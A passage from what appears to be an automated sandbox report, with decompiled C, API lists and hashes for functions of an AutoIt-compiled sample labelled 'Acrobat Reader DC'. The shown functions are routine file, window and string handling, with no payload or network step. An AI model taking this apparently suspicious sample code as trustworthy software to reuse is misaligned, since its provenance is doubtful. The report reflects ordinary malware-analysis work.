							_push(_t44);
							_t49 = E00410160( &_v528, __eflags);
							_t25 = E00413E8A(_t49, 0x5c);
							__eflags = _t25;
							if(__eflags != 0) {
								_push(_t35);
								 *_t25 = 0;
								_t26 = E004335CD(_t35,  &_v528, _t49, __eflags, _t49);
								_push(_t49);
								_t36 = _t26;
								E004111DC();
								__eflags = _t36;
								if(_t36 != 0) {
									_t29 = CreateDirectoryW( &_v528, 0);
									__eflags = _t29;
									_t15 = _t29 != 0;
									__eflags = _t15;
									_t36 = _t36 & 0xffffff00 | _t15;
								}
								return _t36;
							} else {
								_push(_t49);
								E004111DC();
								__eflags = 0;
								return 0;
							}
						} else {
							L6:
							return 1;
						}
					}
				}
			}

















                                  0x004335cd
                                  0x004335cd
                                  0x004335cd
                                  0x004335e6
                                  0x004335f2
                                  0x004335fc
                                  0x00433607
                                  0x0043360e
                                  0x00433612
                                  0x00433612
                                  0x0043360e
                                  0x0043361c
                                  0x00433625
                                  0x004336bb
                                  0x004336bd
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0043362b
                                  0x0043362b
                                  0x00433634
                                  0x0043364f
                                  0x00433652
                                  0x004336bf
                                  0x004336bf
                                  0x004336c4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00433636
                                  0x00433647
                                  0x00433654
                                  0x00433654
                                  0x00433655
                                  0x00433661
                                  0x00433666
                                  0x0043366e
                                  0x00433670
                                  0x00433683
                                  0x00433687
                                  0x0043368a
                                  0x0043368f
                                  0x00433690
                                  0x00433692
                                  0x0043369a
                                  0x0043369c
                                  0x004336a7
                                  0x004336ad
                                  0x004336af
                                  0x004336af
                                  0x004336af
                                  0x004336af
                                  0x004336ba
                                  0x00433672
                                  0x00433672
                                  0x00433673
                                  0x0043367c
                                  0x00433682
                                  0x00433682
                                  0x00433649
                                  0x00433649
                                  0x0043364e
                                  0x0043364e
                                  0x00433647
                                  0x00433634

                                  APIs
                                    • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                  • _wcslen.LIBCMT ref: 004335F2
                                  • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                  • GetLastError.KERNEL32 ref: 0043362B
                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                  • _wcsrchr.LIBCMT ref: 00433666
                                    • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                  • String ID: \
                                  • API String ID: 321622961-2967466578
                                  • Opcode ID: 5b7cbb580858ec080c0b934fadd4bd42aa741e6ee90efb2d39035bace6cc2b79
                                  • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                  • Opcode Fuzzy Hash: 5b7cbb580858ec080c0b934fadd4bd42aa741e6ee90efb2d39035bace6cc2b79
                                  • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E0044C7DD(void* __ecx, void* __edi, char* _a4, intOrPtr _a8) {
				short _t17;
				signed int _t23;
				char* _t35;
				void* _t37;
				void* _t46;
				void* _t49;

				_t37 = __ecx;
				_t35 = _a4;
				_t48 = _a8;
				if(E0041341F(_a8, L"#notrayicon", 0xb) != 0) {
					_t17 = E0041341F(_t48, L"#requireadmin", 0xd);
					__eflags = _t17;
					if(_t17 != 0) {
						__eflags = E0041341F(_t48, L"#OnAutoItStartRegister", 0x16);
						if(__eflags != 0) {
							goto L8;
						} else {
							_push(__edi);
							_t49 = E00410160(_t48 + 0x2c, __eflags);
							E00444B5F(_t37, _t49);
							E00444BBB(_t37, __eflags, _t49);
							_t23 = E004111C1(_t49);
							__eflags =  *((short*)(_t49 + _t23 * 2 - 2)) - 0x22;
							if( *((short*)(_t49 + _t23 * 2 - 2)) != 0x22) {
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 8))))(_t49);
								_push(_t49);
								E004111DC();
								return 1;
							} else {
								__eflags = 0;
								_t7 = _t49 + 2; // 0x2
								_t46 = _t7;
								 *((short*)(_t49 + _t23 * 2 - 2)) = 0;
								E00444B5F(0, _t46);
								E00444BBB(0, __eflags, _t46);
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 8))))(_t46);
								_push(_t49);
								E004111DC();
								return 1;
							}
						}
					} else {
						 *((char*)(_t35 + 1)) = 1;
						L8:
						return 1;
					}
				} else {
					 *_t35 = 1;
					return 1;
				}
			}









                                  0x0044c7dd
                                  0x0044c7e1
                                  0x0044c7e5
                                  0x0044c7fa
                                  0x0044c8ae
                                  0x0044c8b6
                                  0x0044c8b8
                                  0x0044c81e
                                  0x0044c820
                                  0x00000000
                                  0x0044c826
                                  0x0044c826
                                  0x0044c82f
                                  0x0044c832
                                  0x0044c838
                                  0x0044c83e
                                  0x0044c846
                                  0x0044c84c
                                  0x0044c88f
                                  0x0044c891
                                  0x0044c892
                                  0x0044c8a3
                                  0x0044c84e
                                  0x0044c84e
                                  0x0044c850
                                  0x0044c850
                                  0x0044c854
                                  0x0044c859
                                  0x0044c85f
                                  0x0044c86d
                                  0x0044c86f
                                  0x0044c870
                                  0x0044c881
                                  0x0044c881
                                  0x0044c84c
                                  0x0044c8be
                                  0x0044c8be
                                  0x0044c8c3
                                  0x0044c8ca
                                  0x0044c8ca
                                  0x0044c801
                                  0x0044c801
                                  0x0044c80b
                                  0x0044c80b

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsnicmp
                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                  • API String ID: 1038674560-2734436370
                                  • Opcode ID: 16a74993e68b4dbac8944d2924510ff916fa528a3ea3e4646b41ce1c45576bf7
                                  • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                  • Opcode Fuzzy Hash: 16a74993e68b4dbac8944d2924510ff916fa528a3ea3e4646b41ce1c45576bf7
                                  • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00434EC4 Relevance: 12.1, APIs: 8, Instructions: 115memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SysAllocString.OLEAUT32(00000000), ref: 00434EE8
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00434F0B
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00434F37
                                  • SysAllocString.OLEAUT32(00000000), ref: 00434F3E
                                  • SysAllocString.OLEAUT32(?), ref: 00434F64
                                  • SysFreeString.OLEAUT32(?), ref: 00434F6D
                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00434FA8
                                  • SysAllocString.OLEAUT32(?), ref: 00434FB6
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                  • String ID:
                                  • API String ID: 3761583154-0
                                  • Opcode ID: 5a110d4bb8e620b10c6e39c66250f9a1347d1bb15030520e8e6f343428dd6d14
                                  • Instruction ID: 62a2b3f98caf240b0b87dceec1cde1b3ad41479520e9ab1bd59fe61f77259947
                                  • Opcode Fuzzy Hash: 5a110d4bb8e620b10c6e39c66250f9a1347d1bb15030520e8e6f343428dd6d14
                                  • Instruction Fuzzy Hash: A631A5327001186BC710AB99EC49FEFB7A8EB8C731F14427BFA09D7290DA759844C7A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00440F0A Relevance: 12.1, APIs: 8, Instructions: 104windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00440F0A(intOrPtr _a4, struct HDC__* _a8, WCHAR** _a12, signed int _a16, int _a20, struct HWND__* _a24, long _a28, char _a32) {
				void* _t28;
				struct HDC__* _t29;
				signed int _t30;
				struct HWND__** _t46;
				signed int _t67;
				int _t69;

				_t46 = _a8;
				_t67 = _a24;
				_a24 =  *_t46;
				_t28 = _t46[0x10];
				if(_t28 != 0) {
					DeleteObject(_t28);
				}
				_t29 = GetDC(0);
				_a8 = _t29;
				_t30 = GetDeviceCaps(_t29, 0x5a);
				ReleaseDC(0, _a8);
				_t69 = CreateFontW(((0x49f49f49 * _t30 * _a16 >> 0x20) - _t30 * _a16 >> 9 >> 0x1f) + ((0x49f49f49 * _t30 * _a16 >> 0x20) - _t30 * _a16 >> 9), 0, 0, 0, _a20, _t67 & 0x00000002, _t67 & 0x00000004, _t67 & 0x00000008, 1, 4, 0, _a28, 0,  *_a12);
				SendMessageW(_a24, 0x30, _t69, 1);
				if(_t46[0x22] == 1 && _a32 != 0) {
					MoveWindow( *_t46, _t46[0x20], _t46[0x20], _t46[0x21], _t46[0x21], 0);
				}
				if(_t46[0x22] == 0 && _a32 != 0) {
					SendMessageW(_a24, 0x142, 0, 0);
				}
				_t46[0x10] = _t69;
				return E00430B87(_a4, _t46, 1);
			}









                                  0x00440f0f
                                  0x00440f15
                                  0x00440f18
                                  0x00440f1b
                                  0x00440f21
                                  0x00440f24
                                  0x00440f24
                                  0x00440f2c
                                  0x00440f35
                                  0x00440f38
                                  0x00440f46
                                  0x00440fa1
                                  0x00440fa7
                                  0x00440fb0
                                  0x00440fdd
                                  0x00440fdd
                                  0x00440fea
                                  0x00440fff
                                  0x00440fff
                                  0x00441008
                                  0x00441015

                                  APIs
                                  • DeleteObject.GDI32(?), ref: 00440F24
                                  • GetDC.USER32(00000000), ref: 00440F2C
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00440F38
                                  • ReleaseDC.USER32 ref: 00440F46
                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,00000000), ref: 00440F90
                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00440FA7
                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00440FDD
                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00440FFF
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                  • String ID:
                                  • API String ID: 3864802216-0
                                  • Opcode ID: fef0053c073632ff5c176fa8d0eb2aaca295a54c025a4b12eac0c4782f4ea02e
                                  • Instruction ID: d9fc15c341c8c83caa3938f749aa41814f3de42eaf1e3e6405ddac876be99683
                                  • Opcode Fuzzy Hash: fef0053c073632ff5c176fa8d0eb2aaca295a54c025a4b12eac0c4782f4ea02e
                                  • Instruction Fuzzy Hash: F13164B16402147FEB14CF54DC89FAB3799EB98B15F048169FE08DE2C5D6B9E840CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00434FD0 Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SysAllocString.OLEAUT32(00000000), ref: 00434FF2
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00435017
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00435043
                                  • SysAllocString.OLEAUT32(00000000), ref: 0043504A
                                  • SysAllocString.OLEAUT32(00000000), ref: 00435072
                                  • SysFreeString.OLEAUT32(00000000), ref: 0043507B
                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 0043509B
                                  • SysAllocString.OLEAUT32(?), ref: 004350A9
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                  • String ID:
                                  • API String ID: 3761583154-0
                                  • Opcode ID: ec0972bcfea5d1cdd6d34f28d048cabbc30cea4348a6f33495b4b14b450a5c76
                                  • Instruction ID: f42878b2159185360852a952fd690a32193869b943547c3e204aa20c586f66a1
                                  • Opcode Fuzzy Hash: ec0972bcfea5d1cdd6d34f28d048cabbc30cea4348a6f33495b4b14b450a5c76
                                  • Instruction Fuzzy Hash: DD21B4327001146BD710ABA9EC49FAF73A8EB9D731F04427BFA05DB390DAA5984487F5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E0044B489(void* __ecx, void* __eflags, signed long long __fp0, intOrPtr _a4, signed int _a6) {
				long _v8;
				signed int _v12;
				long _v16;
				LONG* _v20;
				void _v65556;
				void* __edi;
				void* __esi;
				intOrPtr _t39;
				long _t53;
				struct _CRITICAL_SECTION* _t60;
				intOrPtr _t67;
				LONG* _t72;
				intOrPtr _t73;
				intOrPtr _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				signed long long _t84;

				_t84 = __fp0;
				_t77 = __eflags;
				E00422240(0x10010);
				_t74 = _a4;
				_t72 = _t74 + 0x34;
				_v20 = _t72;
				InterlockedExchange(_t72, 0x1f5);
				_push(0xffff);
				 *(_t74 + 0x10) = 0xffff;
				_t39 = E004115D7(_t72, _t74, _t77);
				_t76 = _t75 + 4;
				 *((intOrPtr*)(_t74 + 8)) = _t39;
				if(ReadFile( *(_t74 + 0x2c),  &_v65556, 0xffff,  &_v8, 0) != 0) {
					while(_v8 > 0) {
						_t60 = _t74 + 0x14;
						EnterCriticalSection(_t60);
						if( *(_t74 + 0x10) <  *((intOrPtr*)(_t74 + 0xc)) + _v8) {
							_t67 =  *((intOrPtr*)(_t74 + 0xc)) + _v8;
							_t73 =  *((intOrPtr*)(_t74 + 8));
							_a4 = _t67;
							asm("fild dword [ebp+0x8]");
							if(_t67 < 0) {
								_t84 = _t84 +  *0x48cd18;
							}
							_t84 = _t84 *  *0x48cd50;
							asm("fnstcw word [ebp+0xa]");
							_t52 = _a6 & 0x0000ffff | 0x00000c00;
							_v12 = _a6 & 0x0000ffff | 0x00000c00;
							asm("fldcw word [ebp-0x8]");
							asm("fistp qword [ebp-0xc]");
							_t53 = _v16;
							_push(_t53);
							 *(_t74 + 0x10) = _t53;
							asm("fldcw word [ebp+0xa]");
							 *((intOrPtr*)(_t74 + 8)) = E004115D7(_t73, _t74, _t52);
							E00410E60( *((intOrPtr*)(_t74 + 8)), _t73,  *((intOrPtr*)(_t74 + 0xc)));
							_push(_t73);
							E004111DC();
							_t72 = _v20;
							_t76 = _t76 + 0x14;
						}
						E00410E60( *((intOrPtr*)(_t74 + 0xc)) +  *((intOrPtr*)(_t74 + 8)),  &_v65556, _v8);
						 *((intOrPtr*)(_t74 + 0xc)) =  *((intOrPtr*)(_t74 + 0xc)) + _v8;
						_t76 = _t76 + 0xc;
						LeaveCriticalSection(_t60);
						if(ReadFile( *(_t74 + 0x2c),  &_v65556, 0xffff,  &_v8, 0) != 0) {
							continue;
						}
						break;
					}
				}
				InterlockedExchange(_t72, 0x1f6);
				return 0x1f6;
			}





















                                  0x0044b489
                                  0x0044b489
                                  0x0044b491
                                  0x0044b497
                                  0x0044b49b
                                  0x0044b4a4
                                  0x0044b4a7
                                  0x0044b4ad
                                  0x0044b4b2
                                  0x0044b4b9
                                  0x0044b4c1
                                  0x0044b4c6
                                  0x0044b4e2
                                  0x0044b4e9
                                  0x0044b4f3
                                  0x0044b4f7
                                  0x0044b506
                                  0x0044b50b
                                  0x0044b50e
                                  0x0044b511
                                  0x0044b514
                                  0x0044b517
                                  0x0044b519
                                  0x0044b519
                                  0x0044b51f
                                  0x0044b525
                                  0x0044b52c
                                  0x0044b531
                                  0x0044b534
                                  0x0044b537
                                  0x0044b53a
                                  0x0044b53d
                                  0x0044b53e
                                  0x0044b541
                                  0x0044b54d
                                  0x0044b555
                                  0x0044b55a
                                  0x0044b55b
                                  0x0044b560
                                  0x0044b563
                                  0x0044b563
                                  0x0044b578
                                  0x0044b580
                                  0x0044b583
                                  0x0044b587
                                  0x0044b5ab
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044b5ab
                                  0x0044b5b1
                                  0x0044b5b8
                                  0x0044b5c8

                                  APIs
                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                  • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                  • _memmove.LIBCMT ref: 0044B555
                                  • _memmove.LIBCMT ref: 0044B578
                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                  • String ID:
                                  • API String ID: 2737351978-0
                                  • Opcode ID: 9c9723791963644ce26f31177a16715bab8c27555fa06233b9b3905fd288ecd1
                                  • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                  • Opcode Fuzzy Hash: 9c9723791963644ce26f31177a16715bab8c27555fa06233b9b3905fd288ecd1
                                  • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401250 Relevance: 12.1, APIs: 8, Instructions: 86windowtimeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00401250(void* __eax, void* __ecx, struct HWND__* __esi, intOrPtr _a4) {
				struct _NOTIFYICONDATAW _v944;
				int _t34;
				int _t51;
				intOrPtr _t61;
				struct HWND__* _t62;
				void* _t70;

				_t62 = __esi;
				_t34 = __eax - 1;
				if(_t34 != 0) {
					L6:
					return _t34;
				} else {
					_t51 = _t34 + 1;
					_v944.cbSize = 0x3a8;
					E00412F40( &(_v944.hWnd), _t34, 0x3a4);
					E00401B80(_a4, _t70);
					if( *0x4974ea != 0) {
						_t61 = _a4;
						_v944.hWnd = __esi;
						_v944.uID = _t51;
						_v944.uFlags = 2;
						if( *0x4974ec != 0) {
							if( *(_t61 + 0x194) != _t51) {
								 *(_t61 + 0x194) = _t51;
								_v944.hIcon =  *((intOrPtr*)(_t61 + 0x1a8));
								Shell_NotifyIconW(_t51,  &_v944);
							} else {
								 *(_t61 + 0x194) = 0;
								_v944.hIcon =  *((intOrPtr*)(_t61 + 0x19c));
								Shell_NotifyIconW(_t51,  &_v944);
							}
						} else {
							if( *((char*)(_t61 + 9)) != 0) {
								if( *(_t61 + 0x195) == 0) {
									_v944.hIcon =  *((intOrPtr*)(_t61 + 0x1b0));
									 *(_t61 + 0x195) = _t51;
									Shell_NotifyIconW(_t51,  &_v944);
								} else {
									_v944.hIcon =  *((intOrPtr*)(_t61 + 0x19c));
									 *(_t61 + 0x195) = 0;
									Shell_NotifyIconW(_t51,  &_v944);
								}
							} else {
								if( *(_t61 + 0x194) == _t51) {
									 *(_t61 + 0x194) = 0;
									_v944.hIcon =  *((intOrPtr*)(_t61 + 0x19c));
									Shell_NotifyIconW(_t51,  &_v944);
								}
							}
						}
					}
					KillTimer(_t62, _t51);
					_t34 = SetTimer(_t62, _t51, 0x2ee, 0);
					goto L6;
				}
			}









                                  0x00401250
                                  0x00401259
                                  0x0040125c
                                  0x004012e8
                                  0x004012ed
                                  0x00401262
                                  0x00401268
                                  0x00401272
                                  0x0040127c
                                  0x00401287
                                  0x00401293
                                  0x0040129c
                                  0x0040129f
                                  0x004012a5
                                  0x004012ab
                                  0x004012b5
                                  0x004272f2
                                  0x00427328
                                  0x0042732e
                                  0x00427334
                                  0x004272f4
                                  0x00427302
                                  0x00427309
                                  0x0042730f
                                  0x0042730f
                                  0x004012bb
                                  0x004012bf
                                  0x00427346
                                  0x0042737c
                                  0x00427382
                                  0x00427388
                                  0x00427348
                                  0x00427356
                                  0x0042735c
                                  0x00427363
                                  0x00427363
                                  0x004012c5
                                  0x004012cb
                                  0x004273a1
                                  0x004273a8
                                  0x004273ae
                                  0x004273ae
                                  0x004012cb
                                  0x004012bf
                                  0x004012b5
                                  0x004012d3
                                  0x004012e2
                                  0x00000000
                                  0x004012e2

                                  APIs
                                  • _memset.LIBCMT ref: 0040127C
                                    • Part of subcall function 00401B80: _memset.LIBCMT ref: 00401C02
                                    • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                    • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                    • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                  • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                  • SetTimer.USER32 ref: 004012E2
                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                  • String ID:
                                  • API String ID: 1792922140-0
                                  • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                  • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                  • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                  • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413D7F Relevance: 12.1, APIs: 8, Instructions: 63threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E00413D7F(struct _SECURITY_ATTRIBUTES* _a4, long _a8, char _a12, intOrPtr _a16, long _a20, DWORD* _a24) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t16;
				DWORD* _t21;
				void* _t33;
				char _t34;
				void* _t36;

				_t34 = _a12;
				_t26 = 0;
				_t38 = _t34;
				if(_t34 != 0) {
					E004178AE();
					_t36 = E00416B49(1, 0x214);
					__eflags = _t36;
					if(__eflags == 0) {
						L7:
						E00413748(_t36);
						__eflags = _t26;
